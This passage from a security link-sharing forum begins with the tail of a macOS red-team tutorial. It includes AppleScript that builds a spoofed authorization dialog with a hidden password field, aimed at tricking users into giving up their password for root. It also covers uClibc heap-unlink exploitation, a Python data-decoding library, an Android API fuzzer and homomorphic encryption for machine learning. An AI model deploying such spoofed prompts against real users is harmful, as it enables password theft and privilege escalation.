bundle identifier at the beginning of the second substring. Note the as text coercion at the end. One hoop we have to jump through when mixing AppleScript and Objective C is converting back and forth between NSStrings and AppleScript text. With the parent application’s bundle identifier to hand, we can find the parent application’s path thanks to NSWorkspace. We’ll also add a loop to do the same for all items in the PrivilegedHelperTools folder. 
Note how I've moved the text conversion away from the bundleID variable because I still need the NSString for the NSWorkspace call that now follows it. The text conversion is delayed until I need the string again in an AppleScript call, which occurs at the end of the repeat method. At this point, we now have the names of each Privileged Helper tool and its path, as well as the bundle identifier and path of each helper tool's parent app. With this information, we have nearly everything we need for our authorization request. The last remaining step is to grab the application icon from each parent app. Grabbing the Parent Application's Icon Image Application icons typically live in the application bundle's Resources folder and have a .icns extension. Since we have the application's path from above, it should be a simple matter to grab the icon. Before we go on, we'll need to add a couple of "helper handlers" for what's coming next and to keep our code tidy. Also, at the top of our script, we define some constants. For now, we'll leave these as plain text, but we can obscure them in various ways in our final version. Notice the defaultIconStr constant, which provides our default. If you want to see what this looks like, try calling it with the following command:

-- let's get the user name from Foundation framework:
set userName to current application's NSUserName()
display dialog hlprName & my makeChanges & return & my privString & userName & my allowThis default answer "" with title parentName default button "OK" with icon my software_update_icon as «class furl» with hidden answer

Hmm, not bad, but not great either. It would look so much better with the app's actual icon. The icon name is defined in the app's Info.plist. Let's add another handler to grab it: Here's our code for grabbing the icon tidied up: And here are a few examples of what our script produces now: Conclusion Our authorization requests are now looking reasonably convincing. They contain an app name and a process name, both of which will check out as legitimate if the user decides to look into them. We also have a proper password field, and we call the user out by name in the message text. And it's worth reminding ourselves at this point that all this is achieved without triggering any traps set in Mojave and Catalina for cracking down on AppleScript, without knowing anything in advance about what is on the victim's computer and, most importantly, without requiring any privileges at all. Indeed, it's privileges that we're after, and in the next part we'll continue by looking at the code to capture the password entered by the user, as well as how to launch our spoofing script at an appropriate time when the user is actually using one of the apps we found on their system. We'll see how we can adapt the same techniques to target other privileged apps that use kexts and LaunchDaemons rather than Privileged Helper tools. As a bonus, we'll also look into advanced AppleScript techniques for building even better, more convincing dialog boxes with two text fields. If you enjoyed this post, please subscribe to the blog and we will let you know when the next part is live! Disclaimer To avoid any doubt, all the applications mentioned in this post are perfectly legitimate, and to my knowledge none of the apps contain any vulnerabilities related to the content of this post. The techniques described above are entirely outside the control of individual developers.
Sursa: https://www.sentinelone.com/blog/macos-red-team-spoofing-privileged-helpers-and-others-to-gain-root/
  20. November 26, 2019 In this paper, I introduce the reader to a heap metadata corruption against the latest version of uClibc. This allocator is used in embedded systems. The unlink attack on heaps was first introduced by Solar Designer in the year 2000 and was the first generic heap exploitation technique made public. In the unlink technique, an attacker corrupts the prev and next pointers of a free chunk. In a subsequent malloc that recycles this chunk, the chunk is unlinked from its freelist via pointer manipulations. This inadvertently allows an attacker to craft a write-what-where primitive and write what they want where they want in memory. The attack is historical, but it also exists today in uClibc. uClibc Unlink Heap Exploitation.PDF Sursa: https://blog.infosectcbr.com.au/2019/11/uclibc-unlink-heap-exploitation.html
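For readers meeting the unlink primitive for the first time, here is a small, self-contained Python model of the classic unsafe unlink pointer dance. It is a toy simulation only — the offsets and addresses are invented and it is not uClibc's actual code — but it shows why attacker-controlled fd/bk pointers turn into a write-what-where.

# Toy model of the classic "unsafe unlink" write-what-where.
FD_OFF, BK_OFF = 8, 12          # hypothetical offsets of fd/bk inside a free chunk

mem = {}                        # flat "memory": address -> value

def unlink(P):
    """Remove chunk P from its doubly-linked freelist (no safety checks)."""
    FD = mem[P + FD_OFF]        # FD = P->fd
    BK = mem[P + BK_OFF]        # BK = P->bk
    mem[FD + BK_OFF] = BK       # FD->bk = BK   <-- attacker-controlled write
    mem[BK + FD_OFF] = FD       # BK->fd = FD   <-- second, constrained write

# Attacker goal: write `value` to `target` (e.g. a function-pointer slot).
target, value = 0x601018, 0x41414141
chunk = 0x1000                              # the corrupted free chunk

mem[chunk + FD_OFF] = target - BK_OFF       # P->fd = where - offset
mem[chunk + BK_OFF] = value                 # P->bk = what (must itself be writable in a real attack)

unlink(chunk)
assert mem[target] == value                 # write-what-where achieved
print(hex(target), "now holds", hex(mem[target]))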
  21. Nytro

    Chepy

    Chepy is a python library with a handy CLI that aims to mirror some of the capabilities of CyberChef. A reasonable amount of effort was put into Chepy to make it compatible with the various functionalities that CyberChef offers, all in a pure Pythonic manner. There are some key advantages and disadvantages that Chepy has over CyberChef. The CyberChef concept of stacking different modules is kept alive in Chepy. There is still a long way to go for Chepy, as it does not offer every single ability of CyberChef.
Docs
Refer to the docs for full usage information.
Example
For all usage and examples, see the docs. Chepy has a stacking mechanism similar to CyberChef. For example, this in CyberChef: This is equivalent to

from chepy import Chepy

file_path = "/tmp/demo/encoding"

print(
    Chepy(file_path)
    .load_file()
    .reverse()
    .rot_13()
    .base64_decode()
    .base32_decode()
    .hexdump_to_str()
    .o
)

Installation
Chepy can be installed in a few ways.
Pypi
pip3 install chepy
Git
git clone https://github.com/securisec/chepy.git
cd chepy
pip3 install -e .
# I use -e here so that if I update later with git pull, I don't have to install it again (unless dependencies have changed)
Pipenv
git clone https://github.com/securisec/chepy.git
cd chepy
pipenv install
Docker
docker run --rm -ti -v $PWD:/data securisec/chepy "some string" [somefile, "another string"]
Chepy vs CyberChef
Advantages
Chepy is pure python with a supporting and accessible python api
Chepy has a CLI
The Chepy CLI has full autocompletion
Extendable via plugins
Chepy has the concept of recipes, which makes sharing much simpler
Infinitely scalable as it can leverage the full Python library
Chepy can interface with the full CyberChef web app to a certain degree. It is easy to move from Chepy to CyberChef if need be
The Chepy python library is significantly faster than the CyberChef Node library
Works with HTTP/S requests without CORS issues
Disadvantages
Chepy is not a web app (at least for now)
Chepy does not offer every single thing that CyberChef does
Chepy does not have the magic method (at the moment)
Sursa: https://github.com/securisec/chepy
  22. Frida/QBDI Android API Fuzzer This experimental fuzzer is meant to be used for API in-memory fuzzing on Android. The design is highly inspired by and based on AFL/AFL++. At the moment the mutator is quite simple — just AFL's havoc stage — and seed selection is simply FIFO (no favored paths, no trimming, no extra features). These features are planned; if you want to contribute by adding them, PRs are welcome. So far I have only tested the two examples under tests/, so this is a very WIP project. How to This fuzzer is known to work in the Android Emulator (tested on x86_64) but should in theory work on any rooted x86 Android device. Firstly, download the Android x86_64 build of QBDI and extract the archive in a subdirectory of this project named QBDI. Then install Frida on your host with pip3 install frida. Make sure you have a root shell and SELinux disabled on your virtual device:
host$ adb root
host$ adb shell setenforce 0
Download the Android x86_64 frida-server from the repo release page and copy it onto the device under /data/local/tmp (use adb push). Copy libQBDI.so to /data/local/tmp as well. Start a shell and run the frida-server:
device# cd /data/local/tmp
device# ./frida-server-12.7.22-android-x86_64
Now install the test app tests/app-debug.apk by dragging and dropping it into the emulator window. Then, open the app. Compile the agent script with frida-compile:
host$ frida-compile -x index.js -o frida-fuzz-agent.js
Fuzz the test_func function of the libnative-lib.so library shipped with the test app with the command:
host$ python3 fuzz.py output_folder/ com.example.ndktest1
Both interesting testcases and crashes are saved into output_folder. Enjoy.
Sursa: https://github.com/andreafioraldi/frida-qbdi-fuzzer
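Since the mutator mentioned above is essentially AFL's havoc stage, here is a rough Python sketch of what such a stage boils down to. This is illustrative only — the project's real mutator lives in its Frida agent, and AFL's havoc has many more strategies than shown here.

import random

INTERESTING_8 = [0, 1, 0x7f, 0x80, 0xff]   # a few AFL-style "interesting" byte values

def havoc(data: bytes, stacking: int = 8) -> bytes:
    """Apply a random stack of simple mutations to a testcase."""
    buf = bytearray(data) or bytearray(b"\x00")
    for _ in range(random.randint(1, stacking)):
        choice = random.randrange(4)
        pos = random.randrange(len(buf))
        if choice == 0:                        # flip a random bit
            buf[pos] ^= 1 << random.randrange(8)
        elif choice == 1:                      # overwrite with an interesting value
            buf[pos] = random.choice(INTERESTING_8)
        elif choice == 2:                      # insert a random byte
            buf.insert(pos, random.randrange(256))
        elif choice == 3 and len(buf) > 1:     # delete a byte
            del buf[pos]
    return bytes(buf)

seed = b"hello"
print([havoc(seed) for _ in range(3)])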
  23. Machine Learning on Encrypted Data Without Decrypting It 22 Nov 2019 | Keno Fischer Note: This post discusses cutting edge cryptographic techniques. It is intended to give a view into research at Julia Computing. Do not use any examples in this blog post for production applications. Always consult a professional cryptographer before using cryptography. TL;DR: click here to go directly to the package that implements the magic and here for the code that we'll be talking about in this blog post.
Introduction
Suppose you have just developed a spiffy new machine learning model (using Flux.jl of course) and now want to start deploying it for your users. How do you go about doing that? Probably the simplest thing would be to just ship your model to your users and let them run it locally on their data. However, there are a number of problems with this approach:
ML models are large and the user's device may not have enough storage or computation to actually run the model.
ML models are often updated frequently and you may not want to send the large model across the network that often.
Developing ML models takes a lot of time and computational resources, which you may want to recover by charging your users for making use of your model.
The solution that usually comes next is to expose the model as an API in the cloud. These machine-learning-as-a-service offerings have sprung up en masse over the past few years, with every major cloud platform offering such services to the enterprising developer. The dilemma for potential users of such products is obvious: user data is now processed on some remote server that may not necessarily be trustworthy. This has clear ethical and legal ramifications that limit the areas where such solutions can be effective. In regulated industries such as medicine or finance in particular, sending patient or financial data to third parties for processing is often a no-go. Can we do better?
As it turns out we can! Recent breakthroughs in cryptography have made it practical to perform computation on data without ever decrypting it. In our example, the user would send encrypted data (e.g. images) to the cloud API, which would run the machine learning model and then return the encrypted answer. The user data is never decrypted and, in particular, the cloud provider has access neither to the original image nor to the prediction it computed. How is this possible? Let's find out by building a machine learning service for handwriting recognition of encrypted images (from the MNIST dataset).
HE generally
The ability to compute on encrypted data is generally referred to as "secure computation" and is a fairly large area of research, with many different cryptographic approaches and techniques for a plethora of different application scenarios. For our example, we will be focusing on a technique known as "homomorphic encryption". In a homomorphic encryption system, we generally have the following operations available:
pub_key, eval_key, priv_key = keygen()
encrypted = encrypt(pub_key, plaintext)
decrypted = decrypt(priv_key, encrypted)
encrypted′ = eval(eval_key, f, encrypted)
The first three are fairly straightforward and should be familiar to anyone who has used any sort of asymmetric cryptography before (as you did when you connected to this blog post via TLS). The last operation is where the magic is. It evaluates some function f on the encryption and returns another encrypted value corresponding to the result of evaluating f on the encrypted value.
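To make this "evaluation under encryption" idea concrete before diving into CKKS, here is a tiny toy sketch in Python using textbook (unpadded) RSA, which happens to be multiplicatively homomorphic. This is deliberately insecure and has nothing to do with the CKKS scheme used below; it only illustrates the eval-then-decrypt pattern.

# Textbook RSA with tiny, hard-coded parameters (wildly insecure; illustration only).
p, q = 61, 53
n = p * q                      # 3233
e, d = 17, 2753                # e*d ≡ 1 (mod φ(n)), precomputed for these primes

def encrypt(m): return pow(m, e, n)
def decrypt(c): return pow(c, d, n)

def eval_mul(c1, c2):
    # "eval": multiply ciphertexts without ever decrypting them
    return (c1 * c2) % n

m1, m2 = 7, 11
c = eval_mul(encrypt(m1), encrypt(m2))

# The homomorphic property: f(decrypt(...)) == decrypt(eval(f, ...))
assert decrypt(c) == (m1 * m2) % n
print(decrypt(c))              # 77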
It is this property that gives homomorphic computation its name. Evaluation commutes with the encryption operation:
f(decrypt(priv_key, encrypted)) == decrypt(priv_key, eval(eval_key, f, encrypted))
(Equivalently, it is possible to evaluate arbitrary homomorphisms f on the encrypted value.) Which functions f are supported depends on the cryptographic scheme and its supported operations. If only one f is supported (e.g. f = +), we call an encryption scheme "partially homomorphic". If f can be any complete set of gates out of which we can build arbitrary circuits, we call the computation "somewhat homomorphic" if the size of the circuit is limited, or "fully homomorphic" if the size of the circuit is unlimited. It is often possible to turn "somewhat" into "fully" homomorphic encryption through a technique known as bootstrapping, though that is beyond the scope of the current blog post. Fully homomorphic encryption is a fairly recent discovery, with the first viable (though not practical) scheme published by Craig Gentry in 2009. There are several more recent (and practical) FHE schemes. More importantly, there are software packages that implement them efficiently. The two most commonly used ones are probably Microsoft SEAL and PALISADE. In addition, I recently open sourced a pure Julia implementation of these algorithms. For our purposes we will be using the CKKS encryption as implemented in the latter.
CKKS High Level
CKKS (named after Cheon-Kim-Kim-Song, the authors of the 2016 paper that proposed it) is a homomorphic encryption scheme that allows homomorphic evaluation of the following primitive operations:
Elementwise addition of length n vectors of complex numbers
Elementwise multiplication of length n complex vectors
Rotation (in the circshift sense) of elements in the vector
Complex conjugation of vector elements
The parameter n here depends on the desired security and precision and is generally relatively high. For our example it will be 4096 (higher numbers are more secure, but also more expensive, scaling as roughly n log n). Additionally, computations using CKKS are noisy. As a result, computational results are only approximate and care must be taken to ensure that results are evaluated with sufficient precision to not affect the correctness of the result. That said, these restrictions are not all that unusual to developers of machine learning packages. Special-purpose accelerators like GPUs also generally operate on vectors of numbers. Likewise, for many developers floating point numbers can sometimes feel noisy due to effects of algorithm selection, multithreading etc. (I want to emphasize that there is a crucial difference here in that floating point arithmetic is inherently deterministic, even if it sometimes doesn't appear that way due to the complexity of the implementation, while the CKKS primitives really are noisy, but perhaps this allows users to appreciate that noisiness is not as scary as it might at first appear).
With that in mind, let’s see how we can perform these operations in Julia (note: these are highly insecure parameter choices, the purpose of these operations is to illustrate usage of the library at the REPL) julia> using ToyFHE # Let's play with 8 element vectors julia> N = 8; # Choose some parameters - we'll talk about it later julia> ℛ = NegacyclicRing(2N, (40, 40, 40)) ℤ₁₃₂₉₂₂₇₉₉₇₅₆₈₀₈₁₄₅₇₄₀₂₇₀₁₂₀₇₁₀₄₂₄₈₂₅₇/(x¹⁶ + 1) # We'll use CKKS julia> params = CKKSParams(ℛ) CKKS parameters # We need to pick a scaling factor for a numbers - again we'll talk about that later julia> Tscale = FixedRational{2^40} FixedRational{1099511627776,T} where T # Let's start with a plain Vector of zeros julia> plain = CKKSEncoding{Tscale}(zero(ℛ)) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im 0.0 + 0.0im # Ok, we're ready to get started, but first we'll need some keys julia> kp = keygen(params) CKKS key pair julia> kp.priv CKKS private key julia> kp.pub CKKS public key # Alright, let's encrypt some things: julia> foreach(i->plain[i] = i+1, 0:7); plain 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 1.0 + 0.0im 2.0 + 0.0im 3.0 + 0.0im 4.0 + 0.0im 5.0 + 0.0im 6.0 + 0.0im 7.0 + 0.0im 8.0 + 0.0im julia> c = encrypt(kp.pub, plain) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1099511627776,T} where T}) # And decrypt it again julia> decrypt(kp.priv, c) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 0.9999999999995506 - 2.7335193113350057e-16im 1.9999999999989408 - 3.885780586188048e-16im 3.000000000000205 + 1.6772825551165524e-16im 4.000000000000538 - 3.885780586188048e-16im 4.999999999998865 + 8.382500573679615e-17im 6.000000000000185 + 4.996003610813204e-16im 7.000000000001043 - 2.0024593503998215e-16im 8.000000000000673 + 4.996003610813204e-16im # Note that we had some noise. Let's go through all the primitive operations we'll need: julia> decrypt(kp.priv, c+c) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 1.9999999999991012 - 5.467038622670011e-16im 3.9999999999978817 - 7.771561172376096e-16im 6.00000000000041 + 3.354565110233105e-16im 8.000000000001076 - 7.771561172376096e-16im 9.99999999999773 + 1.676500114735923e-16im 12.00000000000037 + 9.992007221626409e-16im 14.000000000002085 - 4.004918700799643e-16im 16.000000000001346 + 9.992007221626409e-16im julia> csq = c*c CKKS ciphertext (length 3, encoding CKKSEncoding{FixedRational{1208925819614629174706176,T} where T}) julia> decrypt(kp.priv, csq) 8-element CKKSEncoding{FixedRational{1208925819614629174706176,T} where T} with indices 0:7: 0.9999999999991012 - 2.350516767363621e-15im 3.9999999999957616 - 5.773159728050814e-15im 9.000000000001226 - 2.534464540987068e-15im 16.000000000004306 - 2.220446049250313e-15im 24.99999999998865 + 2.0903753311370056e-15im 36.00000000000222 + 4.884981308350689e-15im 49.000000000014595 + 1.0182491378134327e-15im 64.00000000001077 + 4.884981308350689e-15im That was easy! The eagle eyed reader may have noticed that csq looks a bit different from the previous ciphertext. In particular, it is a “length 3” ciphertext and the scale is much larger. What these are and what they do is a bit too complicated for this point in the blog post, but suffice it to say, we want to get these back down before we do further computation, or we’ll run out of “space” in the ciphertext. 
Luckily, there is a way to do these for each of the two aspects that grew: # To get back down to length 2, we need to `keyswitch` (aka # relinerarize), which requires an evaluation key. Generating # this requires the private key. In a real application we would # have generated this up front and sent it along with the encrypted # data, but since we have the private key, we can just do it now. julia> ek = keygen(EvalMultKey, kp.priv) CKKS multiplication key julia> csq_length2 = keyswitch(ek, csq) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1208925819614629174706176,T} where T}) # Getting the scale back down is done using modswitching. julia> csq_smaller = modswitch(csq_length2) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1.099511626783e12,T} where T}) # And it still decrypts correctly (though note we've lost some precision) julia> decrypt(kp.priv, csq_smaller) 8-element CKKSEncoding{FixedRational{1.099511626783e12,T} where T} with indices 0:7: 0.9999999999802469 - 5.005163520332181e-11im 3.9999999999957723 - 1.0468514951188039e-11im 8.999999999998249 - 4.7588542623100616e-12im 16.000000000023014 - 1.0413447889166631e-11im 24.999999999955193 - 6.187833723406491e-12im 36.000000000002345 + 1.860733715346631e-13im 49.00000000001647 - 1.442396043149794e-12im 63.999999999988695 - 1.0722489563648028e-10im Additionally, modswitching (short for modulus switching) reduces the size of the ciphertext modulus, so we can’t just keep doing this indefinitely. (In the terminology from above, we’re using a SHE scheme): julia> ℛ # Remember the ring we initially created ℤ₁₃₂₉₂₂₇₉₉₇₅₆₈₀₈₁₄₅₇₄₀₂₇₀₁₂₀₇₁₀₄₂₄₈₂₅₇/(x¹⁶ + 1) julia> ToyFHE.ring(csq_smaller) # It shrunk! ℤ₁₂₀₈₉₂₅₈₂₀₁₄₄₅₉₃₇₇₉₃₃₁₅₅₃/(x¹⁶ + 1) There’s one last operation we’ll need: rotations. Like keyswitching above, this requires an evaluation key (also called a galois key): julia> gk = keygen(GaloisKey, kp.priv; steps=2) CKKS galois key (element 25) julia> decrypt(circshift(c, gk)) decrypt(kp, circshift(c, gk)) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 7.000000000001042 + 5.68459112632516e-16im 8.000000000000673 + 5.551115123125783e-17im 0.999999999999551 - 2.308655353580721e-16im 1.9999999999989408 + 2.7755575615628914e-16im 3.000000000000205 - 6.009767921608429e-16im 4.000000000000538 + 5.551115123125783e-17im 4.999999999998865 + 4.133860996136768e-17im 6.000000000000185 - 1.6653345369377348e-16im # And let's compare to doing the same on the plaintext julia> circshift(plain, 2) 8-element OffsetArray(::Array{Complex{Float64},1}, 0:7) with eltype Complex{Float64} with indices 0:7: 7.0 + 0.0im 8.0 + 0.0im 1.0 + 0.0im 2.0 + 0.0im 3.0 + 0.0im 4.0 + 0.0im 5.0 + 0.0im 6.0 + 0.0im Alright, we’ve covered the basic usage of the HE library. Before we get started thinking about how to perform neural network inference using these primitives, let’s look at and train the neural network we’ll be using. The machine learning model If you’re not familiar with machine learning, or the Flux.jl machine learning library, I’d recommend a quick detour to the Flux.jl documentation or our free Introduction to Machine Learning course on JuliaAcademy, since we’ll only be discussing the changes for running the model on encrypted data. Our starting point is the convolutional neural network example in the Flux model zoo. We’ll keep the training loop, data preparation, etc. the same and just tweak the model slightly. 
The model we'll use is:

function reshape_and_vcat(x)
    let y=reshape(x, 64, 4, size(x, 4))
        vcat((y[:,i,:] for i=axes(y,2))...)
    end
end
model = Chain(
    # First convolution, operating upon a 28x28 image
    Conv((7, 7), 1=>4, stride=(3,3), x->x.^2),
    reshape_and_vcat,
    Dense(256, 64, x->x.^2),
    Dense(64, 10),
)

This is essentially the same model as the one used in the paper "Secure Outsourced Matrix Computation and Application to Neural Networks", which uses the same cryptographic scheme for the same demo, with two differences: 1) they also encrypt the model, which we neglect here for simplicity, and 2) we have bias vectors after every layer (which is what Flux will do by default), which I'm not sure was the case for the model evaluated in the paper. Perhaps because of 2), the test set accuracy of our model is slightly higher (98.6% vs 98.1%), but this may of course also just come down to hyperparameter differences. An unusual feature (for those coming from a machine learning background) is the use of x.^2 activation functions. More common choices here would be something like tanh or relu or something fancier than that. However, while those functions (relu in particular) are cheap to evaluate on plaintext values, they would be quite expensive to evaluate on encrypted values (we'd basically evaluate a polynomial approximation). Luckily x.^2 works fine for our purposes. The rest of the training loop is basically the same. The softmax was removed from the model in favor of a logitcrossentropy loss function (though of course we could have kept it and just evaluated the softmax after decryption on the client). The full code to train this model is on GitHub and completes in a few minutes on any recent GPU.
Performing the operations efficiently
Alright, now that we know what we need to do, let's take stock of what operations we need to be able to do:
Convolutions
Elementwise Squaring
Matrix Multiply
Squaring is trivial, we already saw that above, so let's tackle the other two in order. Throughout we'll be assuming that we're working with a batch size of 64 (you may note that the model parameters and batch size were strategically chosen to take good advantage of a 4096-element vector, which is what we get from realistic parameter choices).
Convolution
Let us recall how convolution works. We take some window (in our case 7x7) of the original input array and for each element in the window multiply it by an element of the convolution mask. Then we move the window over by some amount (in our case, the stride is 3, so we move over by 3 elements) and repeat the process (with the same convolution mask). This process is illustrated in the following animation (source) for a 3x3 convolution with stride (2, 2) (the blue array is the input, the green array the output): Additionally, we have convolutions into 4 different "channels" (all this means is that we repeat the convolution 3 more times with different convolution masks). Alright, so now that we know what we're doing, let's figure out how to do it. We're in luck in that the convolution is the first thing in our model. As a result, we can do some preprocessing on the client before encrypting the data (without needing the model weights) to save us some work. In particular, we'll do the following:
Precompute each convolution window (i.e. the 7x7 extractions from the original images), giving us 64 7x7 matrices per input image (note: for 7x7 windows with stride 3 there are 8x8 convolution windows to evaluate per 28x28 input image)
Collect the same position in each window into one vector, i.e.
we'll have a 64-element vector for each image, or a 64x64 matrix for a batch of 64 (i.e. a total of 49 64x64 matrices)
Encrypt that
The convolution then simply becomes scalar multiplication of the whole matrix with the appropriate mask element, and by summing all 49 elements later, we get the result of the convolution. An implementation of this strategy (on the plaintext) may look like:

function public_preprocess(batch)
    ka = OffsetArray(0:7, 0:7)
    # Create feature extracted matrix
    I = [[batch[i′*3 .+ (1:7), j′*3 .+ (1:7), 1, k] for i′=ka, j′=ka] for k = 1:64]
    # Reshape into the ciphertext
    Iᵢⱼ = [[I[k][l...][i,j] for k=1:64, l=product(ka, ka)] for i=1:7, j=1:7]
end
Iᵢⱼ = public_preprocess(batch)
# Evaluate the convolution
weights = model.layers[1].weight
conv_weights = reverse(reverse(weights, dims=1), dims=2)
conved = [sum(Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4]
conved = map(((x,b),)->x .+ b, zip(conved, model.layers[1].bias))

which (modulo a reordering of the dimensions) gives the same answer as model.layers[1](batch), but using only operations we can perform on the ciphertext. Adding the encryption operations, we have:

Iᵢⱼ = public_preprocess(batch)
C_Iᵢⱼ = map(Iᵢⱼ) do Iij
    plain = CKKSEncoding{Tscale}(zero(plaintext_space(ckks_params)))
    plain .= OffsetArray(vec(Iij), 0:(N÷2-1))
    encrypt(kp, plain)
end
weights = model.layers[1].weight
conv_weights = reverse(reverse(weights, dims=1), dims=2)
conved3 = [sum(C_Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4]
conved2 = map(((x,b),)->x .+ b, zip(conved3, model.layers[1].bias))
conved1 = map(ToyFHE.modswitch, conved2)

Note that a keyswitch isn't required because the weights are public, so we didn't expand the length of the ciphertext.
Matrix multiply
Moving on to matrix multiply, we take advantage of the fact that we can rotate elements in the vector to effect a re-ordering of the multiplication indices. In particular, consider a row-major ordering of matrix elements in the vector. Then, if we shift the vector by a multiple of the row size, we get the effect of rotating the columns, which is a sufficient primitive for implementing matrix multiply (of square matrices at least). Let's try it:

function matmul_square_reordered(weights, x)
    sum(1:size(weights, 1)) do k
        # We rotate the columns of the LHS and take the diagonal
        weight_diag = diag(circshift(weights, (0,(k-1))))
        # We rotate the rows of the RHS
        x_rotated = circshift(x, (k-1,0))
        # We do an elementwise, broadcast multiply
        weight_diag .* x_rotated
    end
end
function matmul_reordered(weights, x)
    sum(partition(1:256, 64)) do range
        matmul_square_reordered(weights[:, range], x[range, :])
    end
end
fc1_weights = model.layers[3].W
x = rand(Float64, 256, 64)
@assert (fc1_weights*x) ≈ matmul_reordered(fc1_weights, x)

Of course, for general matrix multiply we may want something fancier, but it'll do for now.
Making it nicer
At this point, we've managed to get everything together and indeed it works.
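(Before looking at the assembled pipeline, here is a quick plain-NumPy sanity check that the rotate-and-take-diagonal trick above really does compute a matrix product. This is verification on unencrypted data only and is not part of the encrypted pipeline.)

import numpy as np

def matmul_by_rotations(W, x):
    """Square matmul using only rotations, diagonal extraction and
    elementwise multiply-add -- the vector primitives CKKS offers."""
    n = W.shape[0]
    acc = np.zeros((n, x.shape[1]))
    for k in range(n):
        diag_k = np.diag(np.roll(W, k, axis=1))         # picks out W[i, i-k]
        acc += diag_k[:, None] * np.roll(x, k, axis=0)  # times x[i-k, j]
    return acc

W = np.random.randn(64, 64)
x = np.random.randn(64, 8)
assert np.allclose(W @ x, matmul_by_rotations(W, x))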
For reference, here it is in all its glory (omitting setup for parameter selection and the like): ek = keygen(EvalMultKey, kp.priv) gk = keygen(GaloisKey, kp.priv; steps=64) Iᵢⱼ = public_preprocess(batch) C_Iᵢⱼ = map(Iᵢⱼ) do Iij plain = CKKSEncoding{Tscale}(zero(plaintext_space(ckks_params))) plain .= OffsetArray(vec(Iij), 0:(N÷2-1)) encrypt(kp, plain) end weights = model.layers[1].weight conv_weights = reverse(reverse(weights, dims=1), dims=2) conved3 = [sum(C_Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4] conved2 = map(((x,b),)->x .+ b, zip(conved3, model.layers[1].bias)) conved1 = map(ToyFHE.modswitch, conved2) Csqed1 = map(x->x*x, conved1) Csqed1 = map(x->keyswitch(ek, x), Csqed1) Csqed1 = map(ToyFHE.modswitch, Csqed1) function encrypted_matmul(gk, weights, x::ToyFHE.CipherText) result = repeat(diag(weights), inner=64).*x rotated = x for k = 2:64 rotated = ToyFHE.rotate(gk, rotated) result += repeat(diag(circshift(weights, (0,(k-1)))), inner=64) .* rotated end result end fq1_weights = model.layers[3].W Cfq1 = sum(enumerate(partition(1:256, 64))) do (i,range) encrypted_matmul(gk, fq1_weights[:, range], Csqed1[i]) end Cfq1 = Cfq1 .+ OffsetArray(repeat(model.layers[3].b, inner=64), 0:4095) Cfq1 = modswitch(Cfq1) Csqed2 = Cfq1*Cfq1 Csqed2 = keyswitch(ek, Csqed2) Csqed2 = modswitch(Csqed2) function naive_rectangular_matmul(gk, weights, x) @assert size(weights, 1) < size(weights, 2) weights = vcat(weights, zeros(eltype(weights), size(weights, 2)-size(weights, 1), size(weights, 2))) encrypted_matmul(gk, weights, x) end fq2_weights = model.layers[4].W Cresult = naive_rectangular_matmul(gk, fq2_weights, Csqed2) Cresult = Cresult .+ OffsetArray(repeat(vcat(model.layers[4].b, zeros(54)), inner=64), 0:4095) Not very pretty to look at, but hopefully if you have made it this far in the blog post, you should be able to understand each step in the sequence. Now, let’s turn our attention to thinking about some abstractions that would make all this easier. We’re now leaving the realm of cryptography and machine learning and arriving at programming language design, so let’s take advantage of fact that Julia allows powerful abstractions and go through the exercise of building some. For example, we could encapsulate the whole convolution extraction process as a custom array type: using BlockArrays """ ExplodedConvArray{T, Dims, Storage} <: AbstractArray{T, 4} Represents a an `nxmx1xb` array of images, but rearranged into a series of convolution windows. Evaluating a convolution compatible with `Dims` on this array is achievable through a sequence of scalar multiplications and sums on the underling storage. 
""" struct ExplodedConvArray{T, Dims, Storage} <: AbstractArray{T, 4} # sx*sy matrix of b*(dx*dy) matrices of extracted elements # where (sx, sy) = kernel_size(Dims) # (dx, dy) = output_size(DenseConvDims(...)) cdims::Dims x::Matrix{Storage} function ExplodedConvArray{T, Dims, Storage}(cdims::Dims, storage::Matrix{Storage}) where {T, Dims, Storage} @assert all(==(size(storage[1])), size.(storage)) new{T, Dims, Storage}(cdims, storage) end end Base.size(ex::ExplodedConvArray) = (NNlib.input_size(ex.cdims)..., 1, size(ex.x[1], 1)) function ExplodedConvArray{T}(cdims, batch::AbstractArray{T, 4}) where {T} x, y = NNlib.output_size(cdims) kx, ky = NNlib.kernel_size(cdims) stridex, stridey = NNlib.stride(cdims) kax = OffsetArray(0:x-1, 0:x-1) kay = OffsetArray(0:x-1, 0:x-1) I = [[batch[i′*stridex .+ (1:kx), j′*stridey .+ (1:ky), 1, k] for i′=kax, j′=kay] for k = 1:size(batch, 4)] Iᵢⱼ = [[I[k][l...][i,j] for k=1:size(batch, 4), l=product(kax, kay)] for (i,j) in product(1:kx, 1:ky)] ExplodedConvArray{T, typeof(cdims), eltype(Iᵢⱼ)}(cdims, Iᵢⱼ) end function NNlib.conv(x::ExplodedConvArray{<:Any, Dims}, weights::AbstractArray{<:Any, 4}, cdims::Dims) where {Dims<:ConvDims} blocks = reshape([ Base.ReshapedArray(sum(x.x[i,j]*weights[i,j,1,channel] for i=1:7, j=1:7), (NNlib.output_size(cdims)...,1,size(x, 4)), ()) for channel = 1:4 ],(1,1,4,1)) BlockArrays._BlockArray(blocks, BlockArrays.BlockSizes([8], [8], [1,1,1,1], [64])) end Note that here we made use BlockArrays back to represent a 8x8x4x64 array as 4 8x8x1x64 arrays as in the original code. Ok, so now we already have a much nicer representation of the first step, at least on unencrypted arrays: julia> cdims = DenseConvDims(batch, model.layers[1].weight; stride=(3,3), padding=(0,0,0,0), dilation=(1,1)) DenseConvDims: (28, 28, 1) * (7, 7) -> (8, 8, 4), stride: (3, 3) pad: (0, 0, 0, 0), dil: (1, 1), flip: false julia> a = 